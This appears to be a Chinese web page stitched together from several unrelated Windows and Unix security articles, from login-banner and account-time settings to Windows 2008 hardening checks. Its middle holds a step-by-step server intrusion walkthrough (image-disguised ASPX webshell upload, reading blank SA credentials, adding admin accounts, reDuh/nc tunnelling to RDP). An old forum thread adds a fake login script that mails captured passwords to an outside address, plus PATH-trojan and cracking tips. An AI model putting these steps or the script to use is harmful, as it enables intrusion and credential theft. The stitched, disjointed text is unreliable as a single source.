首先使用“Win+R”快捷键,调出系统运行对话框,输入“regedit”命令,单击“确定”按钮,开启系统注册表编辑器运行状态。将鼠标定位在注册表分支HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon上。
其次检查指定分支下是否存在“LegalNoticeCaption”字符串键值,如果找不到该键值时,可以用鼠标右键单击“Winlogon”分支,从弹出的右键菜单中依次选择“新建”|“字符串值”命令,并将新创建的键值名称设置为“LegalNoticeCaption”,用鼠标双击刚刚创建好的键值,弹出如图6所示的设置对话框,输入“系统登录友情提醒”。
同样地,再在“Winlogon”分支下手工创建好“LegalNoticeText”键值,并将其键值设置为“使用计算机时请不要任意修改系统设置”,单击“确定”按钮,保存设置操作,再重启计算机系统。日后,当有人登录自己的计算机系统时,他将会看到“使用计算机时请不要任意修改系统设置”的提示信息。见到这样的提示后,相信朋友或同事一般不会在本地系统中进行恶意操作的。
限制用户使用时间
如果有同事或朋友,要临时借用自己的计算机,不妨通过限制使用时间的办法,来强制用户到时间后,按时归还计算机。要达到这个控制目的,不妨请Login Sentinel Free这款工具来帮忙。首先启动运行Login Sentinel Free程序,并开启它的运行状态,选择主程序界面左上角位置处的“User Control”按钮,之后从Select User列表中选择别人要使用的登录用户账号,如图7所示。
接着选择“Time Schedule”选项卡,一个时间坐标会出现在眼前,该坐标的纵坐标为星期数,横坐标为小时数,按下坐标中的某个时间块时,对应时间块颜色会在红色、绿色之间发生交替变化,如果看到红色时间块时,就意味着在指定时间块内,指定账号不能使用计算机系统,如果看到绿色时间块时,就意味在指定时间块内,目标账号能够正常使用计算机系统。我们可以根据实际情况,将某些时间块颜色设置成红色,以组成拒绝指定用户使用计算机的时间序列。
当然,如果需要设定的时间块是连续的,不妨按下鼠标左键,在连续时间块上拖动鼠标,实现连续使用时间段快速设置操作。完成设置操作后,还需要单击“Save user settings”按钮,将相关设置操作保存起来。日后特定用户只能在规定时间段内使用计算机,其他时间段无法使用计算机。即使已经登录成功的用户,在操作过程中,只要到了限定时间段,Login Sentinel Free程序就会强行注销该用户的登录状态,并自动关闭计算机系统。要想取消目标用户的使用时间限制时,可以先从主程序界面的User下拉列表中,选中指定用户的登录账号名称,再单击“Remove user settings”按钮就可以了。
如今, 校园网服务器的安全, 关系到整个学校日常工作的正常运行, 一旦被侵入, 后果不堪设想, 而此类事故的产生必有隐患, 那么就让我们的管理员行驶“绿客”的职责, 在与黑客“赛跑”的过程中, 提前一步对服务器进行检测, 避免以上种种问题的发生, 为您所管理的服务器打上一针强心剂。
●检测的环境及工具
◇准备一台服务器, 如Windows Server 2003 sp2 SQL2000/2005/2008系统。
◇准备木马工具:ASP木马、ASPX木马、PHP木马, Mstsc.exe远程登录工具, JAVA语言环境、NC.exe、内网渗透利器——reDuh。
●服务器检测实战演练
1. 上传木马
服务器里一般都安装了网站程序ASP (aspx.net) +SQL、PHP+MYSQL等, 并且都提供后台演示或注册上传功能, 这样我们就可以通过网站程序的后台进行上传木马或者提权。
ASPX图片木马就是小图片加上aspx木马程序生成的文件, 看起来是图片, 执行时是木马, 上传时能逃过文件检测判定。在Windows下的DOS窗口, 键入copy1.jpg/b+2.aspx/a2.jpg, 便可以制作木马图片。然后, 我们根据程序网站提供的后台演示, 上传图片木马, 进入木马程序界面, 从图1中可见, 该服务器的管理员并没有进行妥善管理, 没有在aspx.net程序目录以及ASPX中写权限防止上传图片木马。
2. 通过木马程序进行提权
接下来, 我们查看SQL用户, 有些网站管理员直接给SQL超级用户 (SA) 的口令, 却没有设置密码进行保护, 这也使得服务器较容易遭到病毒或木马的攻击。通过图1中的Webshell, 我们可以上传其他木马方便我们对SQL提权 (如图2) , 进而通过SQL提升自己的管理权限。
3. 破解用户与口令
本地SQL服务器是我们要远程连接到的SQL服务器, 但想要实现远程连接, 必先知道其用户与口令。有的网站程序的用户与口令, 就是SQL的超级用户 (SA) 及口令, 这只能说明管理员极其不小心或者学艺不精, 于是, 我们通过木马程序编辑功能查询aspx.net网站程序的web.config这个配置文件, 可以查到SQL数据库用户名与密码:uid=sa;pwd=, 即用户为SA, 密码为空。
4. 通过查询分析器提权
然后, 我们通过本地SQL连接到远程服务器, 并通过查询分析器提权。
(1) 连接数据库。
(2) 添加新用户。
(3) 把用户加到管理组。
(4) 激活GUEST用户。
(5) 把Guest加到管理组。
进行上面一系列的提权后, 生成管理用户与口令, 进行远程登录服务器。
5. 内网渗透利器的远程执行
根据我们上传的木马进行操作, 上传为我们服务的其他木马, 通过木马上传的内网渗透利器在服务器上远程执行, 但不要关闭 (如图3) 。
6. 本地与远程架桥
用服务器上的木马与本地“JAVA语言+NC”进行连接, 架设一桥, 映射端口, 伪装成一个局域网, 因为远程服务器只能在本地运行, 我们可以采用127.0.0.1这个地址远程登录, 进入服务器, 内网的服务器也是通过这种方法进行检测 (如上页图4) 。
(1) 在本地DOS窗口下运行JAVA语言连接远程服务器上的木马, 打开远程服务器在本地1010端口。注意这个不能关闭。
(2) 新开一个命令行, 用NC连接本机1010端口。
DOS命令窗口输入命令:nc-vv localhost 1010 (如上页图5) 。
在DOS命令窗口输入命令:[create Tunnel]1234:127.0.0.1:3389, 连接远程服务器3389端口。
(3) 最后本机窗口有三个, 一个是远程服务木马, 另两个是本地木马映射连接端口 (如图6) 。
7. 进入远程服务器
在本地用mstsc.exe远程登录程序, 进入远程服务器。用户口令以Sys_guest为例。这样我们就控制了整个服务器 (如图7、图8) 。 (本方法在客户端Windows server2003 sp2+SQL2000+JAVA, 服务器Windows server2003/2008+sql2000/2005+aspx环境下测试通过) 。
通过模拟黑客侵入服务器的过程, 我们发现一般服务器需要关闭一些网站目录、写权限、增加一些目录执行ASPX程序运行、网站跨站权限漏洞。同时, SQL服务器要及时升级, 删除一些不必要的限制, SQL超级权限不能轻易授权, 以及网站程序上传漏洞、编辑器的漏洞, 还需要通过升级编辑器等操作来完善, 管理员也要学会一些网站安全防范措施, 如远程用户进入服务器时, 可以联动报警发短信通知等功能。
第一章:主体、用户以及角色
系统安全,大多数情况下就是主体和对象之间的关系。安全主体是所有具有安全标识符SID并且能够访问资源的账户持有者(用户、组和计算机)。
用户:本地用户(在安全账户管理器SAM数据库中创建。一般DC没有本地用户,有也只有在目录恢复模式下使用)和域用户。windows 起跟之前最大的变动就是活动目录。
SID:大写字母S+修订级别(一般是1)+颁发机构(0不可知、1所有用户、2登陆用户、3创建或所有者、5操作系统本身)+第一个子颁发机构(目前最多4个,5登陆的会话、6服务、21不唯一、32内置、80服务)+其余子颁发机构+相对标识符(表示用户或计算机),
如:S-1-5-21-153416595923-165138082-500(该域的SID都是以S-1-5-21-153416595923-165138082开头,再加相对标识符表示用户)。
服务的SID以S-1-5-80开头,以基于服务名的子颁发机构序号结尾。这意味这该服务的SID在所有电脑上都一样。
如查找服务“FOO”的SID,可使用sc showsid命令:sc showsid foo。
当你为用户精心设计了一系列安全措施后,用户总会觉着有点“玄”。他凭什么为这样的网络就是“安全”的呢?是根据设计方案的厚度?还是他为此所花的钱数?到底如何评价一个网络的安全性呢?曾听说过这样的定义:“网络的安全程度定义为该网络被攻击成功的可能性”,听起来倒是蛮有哲理味儿的,可如何实际操作呢?计算机系统的安全程度可以用“橘皮书”的定义来评价,网络系统是不是也可以搞出个“橘皮书”什么的呢?
当你左一层右一层地对信息加密时,心里也许认为层数越多就越安全。但事实是不是真的这样呢?当你又加了一层密时,到底增加了多少的安全性呢?
“喏,你看....”,你指着自己的设计对用户说“即使有人突破了第一道防线,我们还有第二道防线呢。即使第二道也被突破,我们仍然有第三道、第四....”。可怜的用户望着得意洋洋的你,心里不禁嘀咕:“干嘛搞这么复杂....真的非这样不可吗?我可是只是想保证两个星期的安全性啊。”
为了防止大灰狼进来,小猪们把门窗都横七竖八地钉了个死死的。可是大灰狼会不会从别处进来呢?比如说....壁炉的烟囱!聪明的小猪们在壁炉里烧起了一锅开水....。小猪们是聪明的,我们的系统管理员们呢?
计算机系统的安全性依靠一种“访问控制模型”来进行。有没有可能建立一个“网络安全模型”并对它进行形式化的证明,以便从理论上深入开展网络安全的研究?这样就可以摆脱目前的被动地“打补丁”的做法。
网络入侵和网络安全是一对矛盾,没有Hacker高手就不会有好的安全系统。这听起来有些悲哀,可惜是事实。为了提高我们的安全防范能力,我看是不是先培养一批Hacker出来(中国的Hacker太少了)。在此提供几条线索供Hacker们参考:
用过Solaris的snoop命令吗? 用它可以“听到”同一共享网段内的其他用户的口令(当然包括超级用户的)。
sendmail 5.5.9版本以前有个debug命令, 是个强有力的远程调试工具,可惜也是一个大bug。
冒充路由器可以看到所有往来的信息,RIP协议没有身份认证的部分,虽然OSPF协议中有关于身份认证的部分,但很少有人用到。
NFS、NIS都是不太安全的。
1988年的WORM网络病毒最厉害的地方并不是传说中的利用 sendmail的缺陷,而是对看来毫无破绽的finger的攻击!
很多系统管理员为了关机方便而设立了halt之类的特殊用户, 怎样利用这一点来攻击呢?
侵入了一个系统之后,如何“打扫战场”让管理员看不出来? 如何潜伏下来以致于管理员除了重新安装系统,别无清除的办法呢?
....
这些东西都不是我凭空想象的,国外的Hacker们就是这么做的(他们还有很多更厉害的招数呢),
很多东西我也不知道该怎么做,Hacker们自己努力吧。
1-----
: 1).用过Solaris的snoop命令吗? 用它可以“听到”同一共享网段内的其他用户: 的口令(当然包括超级用户的)。
: 3).冒充路由器可以看到所有往来的信息,RIP协议没有身份认证的部分,虽然: OSPF协议中有关于身份认证的部分,但很少有人用到。
这两个是取得口令的最简洁之法, 呵呵. ------- 我也有一简洁之法:
把下面的shell 命令用 ksh 运行
clear
stty ignbrk
echo “login:c”
read logname
stty -echo
echo “password:c”
read passwd
print “ Login incorrect ”
print $logname $passwd | mail cxterm.bbs@jet.ncic.ac.cn
stty 0
stty echo
exit
-----
嗯,是一种方法,但必须你能访问对方的机器才能偷到口令。常用的方法
还有在自己能用的目录里放上叫 “ls” “grep” 之类的程序, 希望 root能不小心运行到她们, 一旦获得 root 权限, 呵呵, 下面的我就不用说了. 所以 root 的PATH里不应当有 . (当前目录).
更彻底的方法就是根据passwd文件里面的密文算口令的明文, 我曾经编过
一个算passwd的程序, 能在 Pentium 100机器上用半个小时左右的时间算出长度<=5 && 只包含字母和数字 的口令. 因此选口令的时候要注意. 用jack14既可,攻击得当的话6位不含大写字母的pass也能在一月内破掉。
这一方法要求必须取得对方含有密文的passwd文件(有shadow passwd的机器上需要取得/etc/shadow), 所以要注意机器上passwd的安全性 (不要试图取消用户对该文件的读权限, 所有的用户都需要能读该文件).
-----
解决的办法, 可以用firewall屏蔽网段。
也可以使用SSL(secure socket layber)替代原有的socket明文数据传输。
-----
:若干机器上都是用户可以直接su halt, 然后就成为超级用户了, :-)
:有的机器你可以用rlogin hostname -l halt 对方的机器就被shutdown了,: 哈哈.
我用su halt 然后就shutdown了. 有n个文件没有存盘.
[b:59a25412aa][/b:59a25412aa][b:59a25412aa][/b:59a25412aa]
检查是否有隐藏账号
为了达到悄悄攻击目的,黑客往往会在服务器系统中生成隐藏账号,并利用该账号将服务器主机变成肉机。当黑客入侵Windows 2008服务器后,会全力以赴保护攻击“成果”,最为有效、最为简单的方法,就是生成隐藏账号,预留攻击后门;由于隐藏账号十分隐蔽,普通人很难发现,它的危害性十分巨大。
黑客一般会采取两种方法,在服务器系统中创建隐藏账号,一是通过修改注册表生成隐藏账号,二是直接使用“$”符号生成隐藏账号。水平不高的黑客,经常会用“$”符号创建隐藏账号,寻找这类隐藏账号时,只要先进入服务器系统DOS命令行窗口,执行“net localgroup administrators”命令,就能在其后界面中,看到所有以“$”符号结尾的隐藏账号了,如图1所示。当然,我们也可以进入服务器系统的计算机管理窗口,定位到“系统工具”|“本地用户和组”|“用户”节点上,查看该节点下的内容,也能找到“$”符号的隐藏账号,因为这种类型账号在这里是没有办法隐藏起来的。
对于通过系统注册表生成的隐藏账号,采取上面的措施,是无法让其现身的,我们也必须进入服务器系统的注册表编辑界面,才能发现这类隐藏账号:依次选择“开始”|“运行”命令,在弹出的系统运行对话框中,执行“regedit”命令,切换到系统注册表编辑界面,将鼠标定位到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names分支上,在目标分支下,我们能看到服务器系统中的所有用户账号。下面,仔细对比这里以及计算机管理窗口中“系统工具”|“本地用户和组”|“用户”节点下的内容,多余出来的账号名称显然就是黑客偷偷创建的隐藏账号了。如果想将隐藏账号删除时,可以直接用鼠标右键单击目标账号,执行快捷菜单中的“删除”命令即可。
为了能及时监控到隐藏账号的行踪,我们可以开启服务器系统的审核功能,来追踪并切断恶意用户通过隐藏账号攻击服务器的途径。打开服务器系统运行对话框,执行“gpedit.msc”命令,切换到系统组策略编辑界面,将鼠标定位到“计算机配置”|“Windows设置”|“安全设置”|“本地策略”|“审核策略”节点上,用鼠标双击目标节点下的“审核登录事件”选项,打开对应选项设置对话框,选中“成功”、“失败”选项,确认后退出设置对话框。同样地,我们还可以对“审核过程追踪”、“审核策略更改”等选项,进行合适的设置。设置成功后,Windows 2008服务器就能自动监控所有用户账号的登录痕迹了,哪怕是隐藏账号也难逃法眼。
无论是再狡猾的隐藏账号,只要它出现在服务器系统中,我们都能通过事件查看器程序,来准确将其识别出来,不但能准确找到隐藏账号的具体名称,而且连它的登录时间也能识别得清清楚楚。哪怕遇到技术水平很高的黑客,偷偷删除了所有相关的日志内容,服务器系统还能追踪到究竟是哪位用户删除了日志内容,这样黑客使用的隐藏账号仍然会被监控到。
当我们通过上面的方法,追踪到隐藏账号的具体名称后,就能下手将其删除掉了。比方说,要删除“bbbb$”隐藏账号时,直接在DOS命令行窗口执行“net user bbbb$ /delete”命令即可。如果我们对DOS命令操作不熟悉,也可以打开系统的计算机管理窗口,定位到“本地用户和组”|“用户”分支上,在目标分支下就能很直观地看到添加了“$”字符的系统隐藏账号了。此时,用鼠标右键单击目标隐藏账号,执行右键菜单中的“删除”命令,就能轻松删除目标系统隐藏账号了。此外,也有一些复杂的系统隐藏账号,我们既不能在DOS命令行窗口中看到它的“身影”,也不能在计算机管理窗口中看到它的“身影”,只能从系统的安全日志文件中找到它们的账号名称。对于这类特殊的系统隐藏账号,我们无法直接将其删除,只能在DOS命令行窗口中使用“net user bbbb$ 1234”之类的命令修改隐藏账号的密码,让目标隐藏账号不能继续生效,拒绝黑客、木马继续使用该账号攻击服务器系统。
检查是否有危险登录
虽然普通用户无法靠近服务器主机现场,但是我们并不能确保自己离开Windows 2008服务器系统时,没有恶意用户悄悄登录进服务器,进行一些不安全操作。如果能让Windows 2008服务器系统跟踪记忆用户的安全登录状态信息,那么黑客偷偷登录服务器主机的行为,自然就难逃我们的法眼了。其实,开启该系统自身的显示以前登录信息功能,就能做到这一点,下面就是具体的操作步骤:
首先以超级用户身份登录Windows 2008系统桌面,使用“Win+R”快捷键,打开系统运行对话框,输入“gpedit.msc”命令并确认后,切换到系统组策略编辑窗口。逐一展开“计算机配置”|“管理模板”|“Windows组件”|“Windows登录选项”节点,选中该节点下的“在用户登录期间显示有关以前登录的信息”选项,并用鼠标双击之,打开如图2所示的组策略属性对话框。
其次看看“已启用”选项是否处于选中状态,要是发现其还没有被选中时,我们应该立即将其重新选中,确认后执行设置保存操作,那么Windows 2008服务器系统内置的显示以前登录信息功能就被开启成功了。日后,网管员自己重新启动Windows 2008服务器系统时,就能从弹出的系统登录账号列标中,检查有没有陌生用户账号了,如果存在陌生账号的登录行为,那多半就是危险登录行为,网管员应该及时找到陌生登录账号,然后采取安全措施进行应对,以便杜绝危险登录事件的再次发生。
nlc202309031727
检查是否有强壮密码
倘若Windows 2008服务器系统的登录密码设置得不够强壮时,恶意用户很容易采取暴力破解方法,获取系统登录密码,所以,我们要加强对服务器的密码进行检查,看看其是否开启了密码策略。
使用“Win+R”快捷键,打开系统运行对话框,输入“gpedit.msc”命令并确认后,切换到系统组策略编辑界面。找到该界面左侧列表中的“计算机配置”|“Windows设置”|“安全设置”|“账户策略”|“密码策略”分支,选中该分支下的“密码复杂性要求”选项,并用鼠标双击之,在其后界面中,检查该组策略的启用状态是否正常。如果发现该组策略没有被开启时,应该立即选择“已启用”选项,同时将“强制密码历史”至少修改为三次,将“密码长度最小值”至少修改为6位以上,将“密码最长使用期限”至少修改为30天左右。
之后,将鼠标再次定位到“计算机配置”|“Windows设置”|“安全设置”|“账户策略”|“账户锁定策略”分支上,将该分支下的“账户锁定阀值”组策略调整为至少三次,确认后保存设置操作。这样,当黑客尝试攻击Windows 2008服务器系统时,一旦输入登录系统密码错误次数超过规定数值时,黑客使用的账号就会被自动锁定起来。
为了方便远程管理服务器系统,很多网管员或许对外开放了远程桌面。为了提高远程桌面安全防范能力,建议大家还要开启服务器系统的网络级身份验证功能,以阻止恶意用户利用远程桌面连接远程控制Windows 2008系统。在开启网络级身份验证功能时,只要执行如下设置操作即可:
首先右击Windows 2008系统桌面上的“计算机”图标,点击快捷菜单中的“属性”命令,弹出服务器系统的属性界面,按下该界面左侧的“远程设置”按钮,切换到远程设置页面(如图3所示),在这里Windows 2008系统支持三个功能选项,来保护远程桌面连接安全性。
我们只要选中“只允许运行带网络身份验证的远程桌面的计算机连接(更安全)”选项,确认后服务器系统的网络级身份验证功能就被开启成功了。这样,服务器系统日后就会强行对远程桌面连接用户进行身份验证,不能通过网络安全验证的用户,将无法远程管理和维护服务器系统,那么服务器的运行安全就能得到一定程度的保证。
检查是否有陌生端口
Windows 2008系统的所有网络连接都是依靠端口进行的,及时了解相关端口的打开状态,有利于确认服务器的工作状态是否安全。善于使用Nmap这款专业的端口扫描工具,我们就能轻松对服务器的所有端口进行扫描,并以此分析本地服务器系统的安全状况,从而提前预防,在黑客发现并利用打开端口之前,就把恶意攻击通道切断。
在安装Nmap工具之前,我们需要先从网上下载安装好Winpcap工具,因为Nmap工具在工作时,需要它的支持。从网上下载Nmap工具时,可以有两种格式可供选择,一种是ZIP压缩格式,该格式不包含图形界面,另外一种是EXE压缩格式,该格式文件只要采取常规方法安装,就能获得图形化的操作界面。
安装并开启Nmap工具的运行状态后,在主程序界面的“Target”位置处设置好扫描对象(如图4所示),也就是说,将服务器主机的IP地址和名称填写在这里,可以指定一台服务器主机的地址或名称,也可以同时指定多台服务器主机的地址或名称。之后,打开“Profile”下拉列表,选择合适的配置文件,这里包括快速扫描、系统探测、加强扫描、服务扫描等参数,设置好这些参数后,按下“Scan”按钮,开始对服务器主机执行扫描操作。扫描任务完成后,切换到“Ports/Hosts”标签设置页面,我们在这里就能发现所有开放端口的详细信息。仔细检查这些内容,要是看到某个服务器端口不是网管员自己开放的,那就必须认真追查陌生开放端口的来龙去脉了。
进入“Nmap Output”标签设置页面,我们不但可以了解到开放端口的具体情况,而且还能查看到服务主机的相关信息、服务开启状态以及操作系统类型等内容,如果发现某个开放端口使用的服务是“未知”的,我们需要上网查询该端口的具体作用,以判断未知服务是否安全。一旦确认未知服务是可疑服务时,不妨直接将其关闭掉,来确保服务器的运行安全。方法是先打开服务器系统运行对话框,输入“services.msc”命令并回车,切换到系统服务列表界面,找到陌生的可疑服务选项,并用鼠标双击之,在其后界面中按下“停止”按钮,同时将它的启动类型选择为“禁用”即可。
检查是否有恶意程序
现在,有些黑客为了达到攻击Windows 2008服务器系统目的,常常会悄悄将一些流氓程序植入到服务器中,一旦流氓程序缠身之后,我们很难将它们清除出服务器。为了远离流氓程序的恶意攻击,我们可以巧妙地使用Windows 2008服务器系统内置的Windows Defender程序,来定期检查系统的所有“角落”,将潜藏在服务器系统暗处的所有恶意流氓程序扫描查找出来,同时自动清除它们。在利用Windows Defender程序检查服务器中是否存在恶意流氓程序时,可以按照下面的步骤来进行:
首先以超级用户账号登录Windows 2008系统,依次选择“开始”|“所有程序”|“Windows Defender”命令,弹出如图5所示Windows Defender程序界面,按下“立即检查更新”按钮,强制Windows Defender程序执行在线升级操作,将其版本更新到最新状态,以确保该程序可以正确识别各种最新的流氓程序。
其次打开Windows Defender程序界面中的“扫描”下拉菜单,选择“完全扫描”选项,这样Windows 2008系统就能自动扫描服务器系统的所有“角落”,那么潜藏在本地计算机中的所有恶意程序都会被准确识别并清除出系统。当然,通过完全扫描方式工作时,耗费的时间会很长,因为现在服务器的硬盘空间几乎都是TB级别的,如果想改善扫描速度时,不妨选择扫描下拉菜单中的“自定义扫描”选项,限制Windows 2008系统仅对特定硬盘分区或系统文件夹执行扫描操作。
nlc202309031728
当扫描操作结束后,Windows Defender程序往往会将扫描到的恶意流氓程序显示出来,选中所有恶意流氓程序选项,按下“全部删除”按钮,这样所有被扫描出来的恶意流氓程序就被彻底删除干净了。此外,我们还可以打开扫描选项设置对话框,按照实际需要对系统扫描类型、扫描频率、扫描时间等参数进行设置,以提高程序的扫描操作效率。
检查是否有恶意下载
不少客户端用户常常会利用P2P工具,在局域网中下载大容量的多媒体信息,这种恶意下载既消耗了局域网宝贵的出口带宽资源,又会对整个网络的安全带来威胁,因为许多多媒体信息可能隐藏有病毒、木马程序。为了保护网络和服务器的运行安全,我们除了通过端口扫描工具,将P2P工具使用的端口识别出来外,还可以利用Windows 2008服务器系统中的高级安全防火墙功能,来创建一个限制特定端口通信的入站和出站规则,以控制网络或服务器中的恶意下载行为:
首先依次单击“开始”|“管理工具”|“服务器管理器”命令,弹出服务器管理器界面,逐一点击该界面左侧列表中的“配置”|“高级安全Windows防火墙”分支,进入Windows 2008系统的高级防火墙配置界面,选中该界面左侧的“入站规则”选项,同时用鼠标右键单击“入站规则”选项,点击快捷菜单中的“新规则”命令,切换到入站规则新建向导设置框。
其次选中“端口”选项,按下“下一步”按钮,进入如图6所示的向导设置对话框,依照向导提示依次选择“TCP”选项、“特定本地端口”选项,同时输入P2P工具使用的端口号码。例如,电骡、迅雷之类的P2P工具,会使用3077、3078等端口号码,那么在“特定本地端口”文本框中,输入“3077,3078”,再按下“下一步”按钮。
当Windows 2008系统高级防火墙弹出提示框,要求用户“连接符合指定条件时应该进行什么操作”时,可以选中“阻止连接”选项,再在其后界面中,定义好该安全规则具体的适用范围,建议大家最好同时选中“域”、“公用”、“专用”等选项,之后定义好安全规则名称,并按下“完成”按钮。这样,所有通过P2P工具进行的恶意下载操作,日后都会被Windows 2008系统防火墙自动拦截。同样地,我们还需要在防火墙中创建一个出站规则,禁止用户随意通过FTP工具向服务器上传内容。
检查是否有密码保护
为了方便局域网用户访问Windows 2008服务器系统中的重要资源,网管员常常会将重要资源设置为共享状态,其他用户只要通过共享访问就能达到访问目的。可是,某些用户在设置共享文件夹时,有时会忘记对共享文件夹设置访问密码,这容易给恶意用户的非法访问提供可乘之机。为了保护重要资源的访问安全,我们不妨检查Windows 2008系统是否开启了密码保护共享功能,如果没有开启该功能时,可以重新启用它,以强行要求用户一定要为共享文件夹设置访问密码,日后只有凭借访问密码才能顺利达到访问目的,下面就是详细的操作步骤:
首先以超级用户账号登录Windows 2008系统,逐一点击“开始”|“设置”|“控制面板”选项,切换到系统控制面板窗口,双击其中的网络和共享中心图标,弹出网络和共享中心控制界面。将鼠标定位到“共享和发现”设置项处,展开“密码保护的共享”设置区域。
其次检查“密码保护的共享”选项是否处于选中状态,要是发现其没有被选中时,应该立即重新选中它,再按下“应用”按钮,这样日后设置共享访问时,一定需要设置访问密码才行,如此一来共享访问安全性才会有保证。
【加强Windows安全性】推荐阅读:
windows实验09-22
windows 域概述05-27
Windows 98关机时重启07-20
提高windows7运行速度07-03
让windows的DNS服务支持泛解析07-17
加强安全法治,保障安全生产09-22
加强安全意识确保安全生产09-27
关于加强企业班组安全建设06-12
如何加强煤矿安全管理09-09
加强学校食品安全管理09-13
